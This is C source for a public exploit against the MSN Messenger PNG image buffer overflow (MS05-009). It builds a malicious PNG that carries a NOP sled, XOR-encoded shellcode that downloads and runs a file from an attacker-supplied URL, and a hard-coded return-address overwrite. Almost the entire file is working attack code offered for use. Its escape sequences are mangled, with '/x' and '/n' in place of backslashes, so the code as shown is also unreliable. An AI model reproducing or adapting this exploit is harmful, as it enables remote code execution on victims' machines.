/*
* form xfocus
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit (MS05-009)
* Bug discoveried by Core Security Technologies (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ?002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/
/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service
packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/
/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>
#ifdef __BORLANDC__
#include <mem.h>
#endif
#define NOP 0x90
char png_header[] =
"/x89/x50/x4E/x47/x0D/x0A/x1A/x0A/x00/x00/x00/x0D/x49/x48/x44/x52"
"/x00/x00/x00/x40/x00/x00/x00/x40/x08/x03/x00/x00/x00/x9D/xB7/x81"
"/xEC/x00/x00/x01/xB9/x74/x52/x4E/x53";
char pngeof[] = "/x90/x90/x90/x59/xE8/x47/xFE/xFF/xFF";
/* Generic win32 http download shellcode
xored with 0x1d by delikon (http://delikon.de/) */
char shellcode[] = "/xEB"
"/x10/x58/x31/xC9/x66/x81/xE9/x22/xFF/x80/x30/x1D/x40/xE2/xFA/xEB/x05/xE8/xEB/xFF"
"/xFF/xFF/xF4/xD1/x1D/x1D/x1D/x42/xF5/x4B/x1D/x1D/x1D/x94/xDE/x4D/x75/x93/x53/x13"
"/xF1/xF5/x7D/x1D/x1D/x1D/x2C/xD4/x7B/xA4/x72/x73/x4C/x75/x68/x6F/x71/x70/x49/xE2"
"/xCD/x4D/x75/x2B/x07/x32/x6D/xF5/x5B/x1D/x1D/x1D/x2C/xD4/x4C/x4C/x90/x2A/x4B/x90"
"/x6A/x15/x4B/x4C/xE2/xCD/x4E/x75/x85/xE3/x97/x13/xF5/x30/x1D/x1D/x1D/x4C/x4A/xE2"
"/xCD/x2C/xD4/x54/xFF/xE3/x4E/x75/x63/xC5/xFF/x6E/xF5/x04/x1D/x1D/x1D/xE2/xCD/x48"
"/x4B/x79/xBC/x2D/x1D/x1D/x1D/x96/x5D/x11/x96/x6D/x01/xB0/x96/x75/x15/x94/xF5/x43"
"/x40/xDE/x4E/x48/x4B/x4A/x96/x71/x39/x05/x96/x58/x21/x96/x49/x18/x65/x1C/xF7/x96"
"/x57/x05/x96/x47/x3D/x1C/xF6/xFE/x28/x54/x96/x29/x96/x1C/xF3/x2C/xE2/xE1/x2C/xDD"
"/xB1/x25/xFD/x69/x1A/xDC/xD2/x10/x1C/xDA/xF6/xEF/x26/x61/x39/x09/x68/xFC/x96/x47"
"/x39/x1C/xF6/x7B/x96/x11/x56/x96/x47/x01/x1C/xF6/x96/x19/x96/x1C/xF5/xF4/x1F/x1D"
"/x1D/x1D/x2C/xDD/x94/xF7/x42/x43/x40/x46/xDE/xF5/x32/xE2/xE2/xE2/x70/x75/x75/x33"
"/x78/x65/x78/x1D";
FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;
/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name[i]=Name[i]^xor;
return Name;
}
void main(int argc, char *argv[])
{
if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit/n");
printf("Bug discoveried by Core Security Technologies (www.coresecurity.com)/n");
printf("Exploit coded By ATmaCA/n");
printf("Copyright ?002-2005 AtmacaSoft Inc. All Rights Reserved./n");
printf("Web: http://www.atmacasoft.com/n");
printf("E-Mail: atmaca@icqmail.com/n");
printf("Credit to kozan and delikon/n/n");
printf("/tUsage:exploit <OutputPath> <Url>/n");
printf("/tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe/n");
return;
}
web = argv[2];
if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!/n");
return;
}
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header[i],di);
/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);
weblength=(short int)0xff22;
pointer=strstr(shellcode,"/x22/xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode =new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"/x1d");
//shell code
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode[i],di);
for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);
/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);
for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof[i],di);
printf("Vulnarable png file %s has been generated!/n",argv[1]);
fclose(di);
}